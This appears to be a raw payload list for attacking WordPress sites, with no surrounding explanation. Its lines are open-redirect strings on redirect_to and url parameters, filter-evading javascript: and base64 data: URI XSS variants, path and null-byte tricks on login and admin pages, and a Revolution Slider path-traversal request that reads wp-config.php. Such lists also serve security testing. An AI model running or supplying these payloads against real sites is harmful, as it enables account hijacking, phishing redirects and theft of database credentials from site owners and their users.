/log-in?redirect_to=https%3A%2F%2F{domain}%2Fwp-admin%2Fconfig.php
/wp-admin/menu.php
/wp-admin/install.php
/wp-admin/upgrade.php
/wp-admin/menu-header.php
/?url=https%3A%2F%2F{domain}%2Fwp-admin%2Fconfig.php
/?redirect_to=https%3A%2F%2F{domain}%252Fwp-admin%252F
/wp-admin?redirect_to=https%3A%2F%2F{domain}%252Fwp-admin%252F
/wp-login.php?action=register
/wp-login.php?action=register&redirect_to=
/wp-signup.php
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/wp-admin/%00
/@wp-login.php
//wp-login.php
/%5cwp-login.php
\wp-login.php
/?redirect_to=https%3A%2F%2F{domain}%252Fwp-admin%252F%00
/wp-admin?redirect_to=https%3A%2F%2Fwww.{domain}%2Fwp-admin%2F&reauth=1
\/\/wp-admin/
/wp-admin/?redirect_to=data:text/html;base64,PHNjcmlwdD5hbGVydCgiT3BlbiBSZWRpcmVjdCBIZXJlISIpOzwvc2NyaXB0Pgo=
\/\/wp-admin/?redirect_to=data:text/html;base64,PHNjcmlwdD5hbGVydCgiT3BlbiBSZWRpcmVjdCBIZXJlISIpOzwvc2NyaXB0Pgo=
////%5cwww.{domain}@/wp-admin/
/?url=ja&Tab;vascript:alert(1)
/wp-admin?redirect_to=ja&NewLine;vascript:alert(1)
?redirect_to=ja&#x0000A;vascript:alert(1)
?redirect_to=java&#x73;cript:alert()
?redirect_to=javascript&colon;alert()
?redirect_to=javascript&#x0003A;alert()
?redirect_to=javascript&#58;alert(1)
?redirect_to=javascript&#x3A;alert()
?redirect_to=javascript:alert&lpar;&rpar;
?redirect_to=javascript:al&#x65;rt``
?redirect_to=javascript:alert%60%60
?redirect_to=javascript:x='%27-alert(1)-%27';
?redirect_to=javascript:%61%6c%65%72%74%28%29
?redirect_to=javascript:a\u006Cert``"
?redirect_to=javascript:\u0061\u006C\u0065\u0072\u0074``
?redirect_to=java%0ascript:alert(1)
?redirect_to=%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(1)
?redirect_to=java%09script:alert(1)
?redirect_to=java%0dscript:alert(1)
?redirect_to=javascript://%0aalert(1)
?redirect_to=javascript://%0aalert`1`
?redirect_to=Javas%26%2399;ript:alert(1)
?redirect_to=https%3A%2F%2F{domain}%252Fwp-admin%252F
?redirect_to=\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
?redirect_to=java%0ascript:alert(1)
?redirect_to=//google%00.com
//%00wp-admin
///google.com
%23google.com
/google.com
javascript:alert(1);
javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)

